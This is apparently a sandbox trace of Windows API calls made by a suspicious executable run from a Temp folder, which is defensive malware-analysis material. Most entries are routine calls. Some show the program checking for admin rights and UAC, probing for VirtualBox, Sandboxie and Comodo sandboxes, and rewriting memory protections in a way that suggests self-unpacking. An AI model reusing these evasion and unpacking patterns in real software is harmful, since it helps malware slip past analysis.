[0284.716] GetCurrentProcessId () returned 0xb7c [0284.716] GetCurrentProcessId () returned 0xb7c [0284.716] GetCurrentProcessId () returned 0xb7c [0284.716] GetCurrentProcessId () returned 0xb7c [0284.716] GetCurrentProcessId () returned 0xb7c [0284.716] GetCurrentProcessId () returned 0xb7c [0284.716] GetCurrentProcessId () returned 0xb7c [0284.716] GetCurrentProcessId () returned 0xb7c [0284.716] GetCurrentProcessId () returned 0xb7c [0284.716] GetCurrentProcessId () returned 0xb7c [0284.716] GetCurrentProcessId () returned 0xb7c [0284.716] GetCurrentProcessId () returned 0xb7c [0284.716] GetCurrentProcessId () returned 0xb7c [0284.716] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0xc50000 [0284.717] VirtualFree (lpAddress=0xc50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0284.718] GetCurrentProcessId () returned 0xb7c [0284.718] GetCurrentProcessId () returned 0xb7c [0284.718] GetCurrentProcessId () returned 0xb7c [0284.718] GetCurrentProcessId () returned 0xb7c [0284.718] GetCurrentProcessId () returned 0xb7c [0284.718] GetCurrentProcessId () returned 0xb7c [0284.718] GetCurrentProcessId () returned 0xb7c [0284.718] GetCurrentProcessId () returned 0xb7c [0284.718] GetCurrentProcessId () returned 0xb7c [0284.718] GetCurrentProcessId () returned 0xb7c [0284.718] GetCurrentProcessId () returned 0xb7c [0284.718] GetCurrentProcessId () returned 0xb7c [0284.718] GetCurrentProcessId () returned 0xb7c [0284.718] GetCurrentProcessId () returned 0xb7c [0284.719] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0xc50000 [0284.719] VirtualFree (lpAddress=0xc50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0284.720] GetCurrentProcessId () returned 0xb7c [0284.720] GetCurrentProcessId () returned 0xb7c [0284.720] GetCurrentProcessId () returned 0xb7c [0284.720] GetCurrentProcessId () returned 0xb7c [0284.720] GetCurrentProcessId () returned 0xb7c [0284.721] GetCurrentProcessId () returned 0xb7c [0284.721] GetCurrentProcessId () returned 0xb7c [0284.721] GetCurrentProcessId () returned 0xb7c [0284.721] GetCurrentProcessId () returned 0xb7c [0284.721] GetCurrentProcessId () returned 0xb7c [0284.721] GetCurrentProcessId () returned 0xb7c [0284.721] GetCurrentProcessId () returned 0xb7c [0284.721] GetCurrentProcessId () returned 0xb7c [0284.721] GetCurrentProcessId () returned 0xb7c [0284.721] GetCurrentProcessId () returned 0xb7c [0284.721] GetCurrentProcessId () returned 0xb7c [0284.721] GetCurrentProcessId () returned 0xb7c [0284.721] GetCurrentProcessId () returned 0xb7c [0284.721] GetCurrentProcessId () returned 0xb7c [0284.721] GetCurrentProcessId () returned 0xb7c [0284.721] GetCurrentProcessId () returned 0xb7c [0284.721] GetCurrentProcessId () returned 0xb7c [0284.722] GetCurrentProcessId () returned 0xb7c [0284.722] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0xc50000 [0284.724] VirtualFree (lpAddress=0xc50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0284.725] GetCurrentProcessId () returned 0xb7c [0284.725] GetCurrentProcessId () returned 0xb7c [0284.725] GetCurrentProcessId () returned 0xb7c [0284.725] GetCurrentProcessId () returned 0xb7c [0284.725] GetCurrentProcessId () returned 0xb7c [0284.725] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0xc50000 [0284.727] VirtualFree (lpAddress=0xc50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0284.728] GetCurrentProcessId () returned 0xb7c [0284.728] GetCurrentProcessId () returned 0xb7c [0284.728] GetCurrentProcessId () returned 0xb7c [0284.728] GetCurrentProcessId () returned 0xb7c [0284.728] GetCurrentProcessId () returned 0xb7c [0284.728] GetCurrentProcessId () returned 0xb7c [0284.728] GetCurrentProcessId () returned 0xb7c [0284.728] GetCurrentProcessId () returned 0xb7c [0284.728] GetCurrentProcessId () returned 0xb7c [0284.728] GetCurrentProcessId () returned 0xb7c [0284.728] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0xc50000 [0284.729] GetCurrentProcessId () returned 0xb7c [0284.729] GetCurrentProcessId () returned 0xb7c [0284.729] GetCurrentProcessId () returned 0xb7c [0284.729] GetCurrentProcessId () returned 0xb7c [0284.729] GetCurrentProcessId () returned 0xb7c [0284.729] GetCurrentProcessId () returned 0xb7c [0284.729] GetCurrentProcessId () returned 0xb7c [0284.729] GetCurrentProcessId () returned 0xb7c [0284.729] GetCurrentProcessId () returned 0xb7c [0284.729] GetCurrentProcessId () returned 0xb7c [0284.729] GetCurrentProcessId () returned 0xb7c [0284.729] GetCurrentProcessId () returned 0xb7c [0284.729] GetCurrentProcessId () returned 0xb7c [0284.730] GetCurrentProcessId () returned 0xb7c [0284.730] GetCurrentProcessId () returned 0xb7c [0284.730] GetCurrentProcessId () returned 0xb7c [0284.730] GetCurrentProcessId () returned 0xb7c [0284.731] VirtualFree (lpAddress=0x25b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0284.732] VirtualFree (lpAddress=0x25b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0284.733] VirtualFree (lpAddress=0x25b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0284.734] VirtualFree (lpAddress=0x25b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0284.735] VirtualFree (lpAddress=0x25b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0284.737] VirtualFree (lpAddress=0x25b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0284.738] VirtualFree (lpAddress=0x25b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0285.039] LoadLibraryA (lpLibFileName="user32.dll") returned 0x773b0000 [0285.040] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76c20000 [0285.041] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x779e0000 [0285.041] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75cb0000 [0285.042] LoadLibraryA (lpLibFileName="shlwapi.dll") returned 0x771d0000 [0285.060] GetProcAddress (hModule=0x779e0000, lpProcName="RtlEnterCriticalSection") returned 0x77a022b0 [0285.061] GetProcAddress (hModule=0x779e0000, lpProcName="RtlLeaveCriticalSection") returned 0x77a02270 [0285.061] GetProcAddress (hModule=0x779e0000, lpProcName="RtlInitializeCriticalSection") returned 0x77a12c42 [0285.196] GetProcAddress (hModule=0x769b0000, lpProcName="SetLastError") returned 0x769c11a9 [0285.197] GetProcAddress (hModule=0x769b0000, lpProcName="GetLastError") returned 0x769c11c0 [0285.204] GetProcessHeap () returned 0xc90000 [0285.204] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x410) returned 0xcb4980 [0285.207] GetProcessHeap () returned 0xc90000 [0285.207] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x10) returned 0xca4998 [0285.207] GetProcessHeap () returned 0xc90000 [0285.207] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x410) returned 0xcb4d98 [0285.208] GetProcessHeap () returned 0xc90000 [0285.208] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x10) returned 0xca49b0 [0285.208] GetCurrentDirectoryW (in: nBufferLength=0x208, lpBuffer=0xcb4d98 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0285.208] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xcb4980, nSize=0x208 | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\99.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\99.exe")) returned 0x2b [0285.208] SetCurrentDirectoryW (lpPathName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp")) returned 1 [0285.210] GetCurrentThreadId () returned 0xb80 [0285.210] OpenThread (dwDesiredAccess=0x1f03ff, bInheritHandle=0, dwThreadId=0xb80) returned 0x1c [0285.211] GetUserDefaultUILanguage () returned 0x409 [0285.216] GetProcessHeap () returned 0xc90000 [0285.216] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x1000) returned 0xcb57e0 [0285.217] GetProcessHeap () returned 0xc90000 [0285.217] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x10) returned 0xca49c8 [0285.220] GetCommandLineA () returned="\"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\99.exe\" " [0285.392] GetVersion () returned 0x1db10106 [0285.396] SetCurrentDirectoryW (lpPathName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 1 [0285.396] SetCurrentDirectoryW (lpPathName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp")) returned 1 [0285.399] GetCurrentThread () returned 0xfffffffe [0285.399] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x67fa04 | out: TokenHandle=0x67fa04*=0x0) returned 0 [0285.401] GetCurrentProcess () returned 0xffffffff [0285.401] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x67fa04 | out: TokenHandle=0x67fa04*=0xd4) returned 1 [0285.401] GetTokenInformation (in: TokenHandle=0xd4, TokenInformationClass=0x2, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x67aad0 | out: TokenInformation=0x0, ReturnLength=0x67aad0) returned 0 [0285.401] VirtualAlloc (lpAddress=0x0, dwSize=0x140, flAllocationType=0x1000, flProtect=0x4) returned 0xc50000 [0285.402] GetTokenInformation (in: TokenHandle=0xd4, TokenInformationClass=0x2, TokenInformation=0xc50000, TokenInformationLength=0x140, ReturnLength=0x67aad0 | out: TokenInformation=0xc50000, ReturnLength=0x67aad0) returned 1 [0285.402] CloseHandle (hObject=0xd4) returned 1 [0285.403] AllocateAndInitializeSid (in: pIdentifierAuthority=0x67ba18, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x683c38 | out: pSid=0x683c38*=0xca49e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0285.403] EqualSid (pSid1=0xca49e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0xc50074*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f))) returned 0 [0285.403] EqualSid (pSid1=0xca49e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0xc5007c*(Revision=0x15, SubAuthorityCount=0x0, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x2f, [3]=0x94, [4]=0x7f, [5]=0xfb), SubAuthority=0xfbc24a41)) returned 0 [0285.403] EqualSid (pSid1=0xca49e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0xc50084*(Revision=0x41, SubAuthorityCount=0x4a, IdentifierAuthority.Value=([0]=0xc2, [1]=0xfb, [2]=0xb4, [3]=0x36, [4]=0x96, [5]=0xe4), SubAuthority=([0]=0x1, [1]=0x2, [2]=0x0, [3]=0x0, [4]=0x1, [5]=0x1, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x1, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x1, [17]=0x1, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x5, [24]=0x72, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x1, [29]=0x2, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x5, [36]=0x20, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x20, [41]=0x2, [42]=0x0, [43]=0x0, [44]=0x1, [45]=0x2, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x5, [52]=0x20, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x21, [57]=0x2, [58]=0x0, [59]=0x0, [60]=0x1, [61]=0x1, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x5, [68]=0x4, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x1, [73]=0x1))) returned 0 [0285.403] EqualSid (pSid1=0xca49e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0xc5008c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x1, [3]=0x1, [4]=0x0, [5]=0x0), SubAuthority=([0]=0x0, [1]=0x0))) returned 0 [0285.403] EqualSid (pSid1=0xca49e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0xc50094*(Revision=0x0, SubAuthorityCount=0x0, IdentifierAuthority.Value=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x101)) returned 0 [0285.403] EqualSid (pSid1=0xca49e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0xc5009c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x72)) returned 0 [0285.403] EqualSid (pSid1=0xca49e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0xc500a4*(Revision=0x72, SubAuthorityCount=0x0, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x1, [3]=0x2, [4]=0x0, [5]=0x0), SubAuthority=0x5000000)) returned 0 [0285.403] EqualSid (pSid1=0xca49e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0xc500ac*(Revision=0x0, SubAuthorityCount=0x0, IdentifierAuthority.Value=([0]=0x0, [1]=0x5, [2]=0x20, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x220)) returned 0 [0285.403] EqualSid (pSid1=0xca49e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0xc500b4*(Revision=0x20, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x1, [3]=0x2, [4]=0x0, [5]=0x0), SubAuthority=([0]=0x0, [1]=0x0))) returned 0 [0285.403] EqualSid (pSid1=0xca49e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0xc500bc*(Revision=0x0, SubAuthorityCount=0x0, IdentifierAuthority.Value=([0]=0x0, [1]=0x5, [2]=0x20, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x221)) returned 0 [0285.403] EqualSid (pSid1=0xca49e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0xc500c4*(Revision=0x21, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x1, [3]=0x1, [4]=0x0, [5]=0x0), SubAuthority=([0]=0x0, [1]=0x0))) returned 0 [0285.403] EqualSid (pSid1=0xca49e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0xc500cc*(Revision=0x0, SubAuthorityCount=0x0, IdentifierAuthority.Value=([0]=0x0, [1]=0x5, [2]=0x4, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x101)) returned 0 [0285.403] EqualSid (pSid1=0xca49e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0xc500d4*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x1)) returned 0 [0285.403] EqualSid (pSid1=0xca49e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0xc500dc*(Revision=0x1, SubAuthorityCount=0x0, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x1, [3]=0x1, [4]=0x0, [5]=0x0), SubAuthority=0x5000000)) returned 0 [0285.404] VirtualFree (lpAddress=0xc50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0285.405] GetProcAddress (hModule=0x75cb0000, lpProcName="IsUserAnAdmin") returned 0x75d044f5 [0285.405] IsUserAnAdmin () returned 1 [0285.406] RegOpenKeyA (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", phkResult=0x67ab2c | out: phkResult=0x67ab2c*=0xd8) returned 0x0 [0285.406] RegQueryValueExA (in: hKey=0xd8, lpValueName="EnableLUA", lpReserved=0x0, lpType=0x0, lpData=0x67dc7c, lpcbData=0x684574*=0x4 | out: lpType=0x0, lpData=0x67dc7c*=0x1, lpcbData=0x684574*=0x4) returned 0x0 [0285.407] RegCloseKey (hKey=0xd8) returned 0x0 [0285.411] GetProcessHeap () returned 0xc90000 [0285.411] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x10) returned 0xca49e0 [0285.411] GetProcessHeap () returned 0xc90000 [0285.411] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x10) returned 0xca49f8 [0285.414] GetSystemFirmwareTable (in: FirmwareTableProviderSignature=0x52534d42, FirmwareTableID=0x0, pFirmwareTableBuffer=0x0, BufferSize=0x0 | out: pFirmwareTableBuffer=0x0) returned 0x603 [0285.414] GetProcessHeap () returned 0xc90000 [0285.414] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x603) returned 0xcb67e8 [0285.414] GetSystemFirmwareTable (in: FirmwareTableProviderSignature=0x52534d42, FirmwareTableID=0x0, pFirmwareTableBuffer=0xcb67e8, BufferSize=0x603 | out: pFirmwareTableBuffer=0xcb67e8) returned 0x603 [0285.414] GetProcessHeap () returned 0xc90000 [0285.415] RtlFreeHeap (HeapHandle=0xc90000, Flags=0x0, BaseAddress=0xcb67e8) returned 1 [0285.417] RegOpenKeyA (in: hKey=0x80000002, lpSubKey="SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000", phkResult=0x683640 | out: phkResult=0x683640*=0xd8) returned 0x0 [0285.417] RegQueryValueExA (in: hKey=0xd8, lpValueName="DriverDesc", lpReserved=0x0, lpType=0x0, lpData=0x67c4c0, lpcbData=0x67d42c*=0x3cc52f4a | out: lpType=0x0, lpData=0x67c4c0*=0x53, lpcbData=0x67d42c*=0x1e) returned 0x0 [0285.418] RegCloseKey (hKey=0xd8) returned 0x0 [0285.418] RegOpenKeyA (in: hKey=0x80000002, lpSubKey="Hardware\\description\\System", phkResult=0x683640 | out: phkResult=0x683640*=0xd8) returned 0x0 [0285.418] RegQueryValueExA (in: hKey=0xd8, lpValueName="SystemBiosVersion", lpReserved=0x0, lpType=0x0, lpData=0x67c4c0, lpcbData=0x67d42c*=0x200 | out: lpType=0x0, lpData=0x67c4c0*=0x44, lpcbData=0x67d42c*=0x4b) returned 0x0 [0285.418] RegQueryValueExA (in: hKey=0xd8, lpValueName="VideoBiosVersion", lpReserved=0x0, lpType=0x0, lpData=0x67c4c0, lpcbData=0x67d42c*=0x200 | out: lpType=0x0, lpData=0x67c4c0*=0x44, lpcbData=0x67d42c*=0x200) returned 0x2 [0285.418] RegQueryValueExA (in: hKey=0xd8, lpValueName="SystemBiosVersion", lpReserved=0x0, lpType=0x0, lpData=0x67c4c0, lpcbData=0x67d42c*=0x200 | out: lpType=0x0, lpData=0x67c4c0*=0x44, lpcbData=0x67d42c*=0x4b) returned 0x0 [0285.418] RegCloseKey (hKey=0xd8) returned 0x0 [0285.419] RegOpenKeyA (in: hKey=0x80000002, lpSubKey="HARDWARE\\ACPI\\DSDT\\VBOX__", phkResult=0x683640 | out: phkResult=0x683640*=0x0) returned 0x2 [0285.425] GetModuleHandleA (lpModuleName="cmdvrt32.dll") returned 0x0 [0285.551] GetModuleHandleA (lpModuleName="SbieDll.dll") returned 0x0 [0285.553] VirtualAlloc (lpAddress=0x0, dwSize=0x52c00, flAllocationType=0x1000, flProtect=0x4) returned 0x3440000 [0285.554] VirtualProtect (in: lpAddress=0x401000, dwSize=0x52c00, flNewProtect=0x4, lpflOldProtect=0x684a28 | out: lpflOldProtect=0x684a28*=0x40) returned 1 [0285.560] VirtualAlloc (lpAddress=0x0, dwSize=0x3e6c, flAllocationType=0x1000, flProtect=0x4) returned 0xc50000 [0285.591] VirtualFree (lpAddress=0xc50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0285.756] VirtualProtect (in: lpAddress=0x401000, dwSize=0x52c00, flNewProtect=0x40, lpflOldProtect=0x684a28 | out: lpflOldProtect=0x684a28*=0x4) returned 1 [0285.759] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0285.764] VirtualAlloc (lpAddress=0x0, dwSize=0x17200, flAllocationType=0x1000, flProtect=0x4) returned 0x3440000 [0285.764] VirtualProtect (in: lpAddress=0x454000, dwSize=0x17200, flNewProtect=0x4, lpflOldProtect=0x684a28 | out: lpflOldProtect=0x684a28*=0x40) returned 1 [0285.766] VirtualAlloc (lpAddress=0x0, dwSize=0x3e6c, flAllocationType=0x1000, flProtect=0x4) returned 0xc50000 [0285.772] VirtualFree (lpAddress=0xc50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0285.775] VirtualProtect (in: lpAddress=0x454000, dwSize=0x17200, flNewProtect=0x40, lpflOldProtect=0x684a28 | out: lpflOldProtect=0x684a28*=0x4) returned 1 [0285.777] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0285.779] VirtualAlloc (lpAddress=0x0, dwSize=0xe00, flAllocationType=0x1000, flProtect=0x4) returned 0xc50000 [0285.779] VirtualProtect (in: lpAddress=0x46c000, dwSize=0xe00, flNewProtect=0x4, lpflOldProtect=0x684a28 | out: lpflOldProtect=0x684a28*=0x40) returned 1 [0285.780] VirtualAlloc (lpAddress=0x0, dwSize=0x3e6c, flAllocationType=0x1000, flProtect=0x4) returned 0x25b0000 [0285.781] VirtualFree (lpAddress=0x25b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0285.782] VirtualProtect (in: lpAddress=0x46c000, dwSize=0xe00, flNewProtect=0x40, lpflOldProtect=0x684a28 | out: lpflOldProtect=0x684a28*=0x4) returned 1 [0285.783] VirtualFree (lpAddress=0xc50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0285.784] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0xc50000 [0285.785] VirtualProtect (in: lpAddress=0x470000, dwSize=0x200, flNewProtect=0x4, lpflOldProtect=0x684a28 | out: lpflOldProtect=0x684a28*=0x80) returned 1 [0285.785] VirtualAlloc (lpAddress=0x0, dwSize=0x3e6c, flAllocationType=0x1000, flProtect=0x4) returned 0x25b0000 [0285.786] VirtualFree (lpAddress=0x25b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0285.787] VirtualProtect (in: lpAddress=0x470000, dwSize=0x200, flNewProtect=0x80, lpflOldProtect=0x684a28 | out: lpflOldProtect=0x684a28*=0x4) returned 1 [0285.787] VirtualFree (lpAddress=0xc50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0285.788] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0xc50000 [0285.789] VirtualProtect (in: lpAddress=0x471000, dwSize=0x400, flNewProtect=0x4, lpflOldProtect=0x684a28 | out: lpflOldProtect=0x684a28*=0x40) returned 1 [0285.789] VirtualAlloc (lpAddress=0x0, dwSize=0x3e6c, flAllocationType=0x1000, flProtect=0x4) returned 0x25b0000 [0285.790] VirtualFree (lpAddress=0x25b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0285.791] VirtualProtect (in: lpAddress=0x471000, dwSize=0x400, flNewProtect=0x40, lpflOldProtect=0x684a28 | out: lpflOldProtect=0x684a28*=0x4) returned 1 [0285.791] VirtualFree (lpAddress=0xc50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0285.792] VirtualAlloc (lpAddress=0x0, dwSize=0x4c00, flAllocationType=0x1000, flProtect=0x4) returned 0xc50000 [0285.792] VirtualProtect (in: lpAddress=0x472000, dwSize=0x4c00, flNewProtect=0x4, lpflOldProtect=0x684a28 | out: lpflOldProtect=0x684a28*=0x40) returned 1 [0285.793] VirtualAlloc (lpAddress=0x0, dwSize=0x3e6c, flAllocationType=0x1000, flProtect=0x4) returned 0x25b0000 [0285.794] VirtualFree (lpAddress=0x25b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0285.795] VirtualProtect (in: lpAddress=0x472000, dwSize=0x4c00, flNewProtect=0x40, lpflOldProtect=0x684a28 | out: lpflOldProtect=0x684a28*=0x4) returned 1 [0285.796] VirtualFree (lpAddress=0xc50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0285.797] VirtualAlloc (lpAddress=0x0, dwSize=0x3a00, flAllocationType=0x1000, flProtect=0x4) returned 0xc50000 [0285.797] VirtualProtect (in: lpAddress=0x477000, dwSize=0x3a00, flNewProtect=0x4, lpflOldProtect=0x684a28 | out: lpflOldProtect=0x684a28*=0x40) returned 1 [0285.798] VirtualAlloc (lpAddress=0x0, dwSize=0x3e6c, flAllocationType=0x1000, flProtect=0x4) returned 0x25b0000 [0285.863] VirtualFree (lpAddress=0x25b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0285.865] VirtualProtect (in: lpAddress=0x477000, dwSize=0x3a00, flNewProtect=0x40, lpflOldProtect=0x684a28 | out: lpflOldProtect=0x684a28*=0x4) returned 1 [0285.865] VirtualFree (lpAddress=0xc50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0285.868] VirtualProtect (in: lpAddress=0x469808, dwSize=0xdc, flNewProtect=0x40, lpflOldProtect=0x684e30 | out: lpflOldProtect=0x684e30*=0x40) returned 1 [0285.869] VirtualProtect (in: lpAddress=0x454000, dwSize=0x49c, flNewProtect=0x40, lpflOldProtect=0x67fd0c | out: lpflOldProtect=0x67fd0c*=0x40) returned 1 [0285.870] VirtualProtect (in: lpAddress=0x454000, dwSize=0x494, flNewProtect=0x40, lpflOldProtect=0x684a0c | out: lpflOldProtect=0x684a0c*=0x40) returned 1 [0285.872] GetModuleHandleA (lpModuleName="SHELL32.dll") returned 0x75cb0000 [0285.873] GetModuleHandleA (lpModuleName="USER32.dll") returned 0x773b0000 [0285.873] GetModuleHandleA (lpModuleName="GDI32.dll") returned 0x77240000 [0285.873] GetModuleHandleA (lpModuleName="ADVAPI32.dll") returned 0x76c20000 [0285.874] GetModuleHandleA (lpModuleName="SHLWAPI.dll") returned 0x771d0000 [0285.874] GetModuleHandleA (lpModuleName="gdiplus.dll") returned 0x6c5c0000 [0285.875] GetModuleHandleA (lpModuleName="WINMM.dll") returned 0x6bed0000 [0285.875] GetModuleHandleA 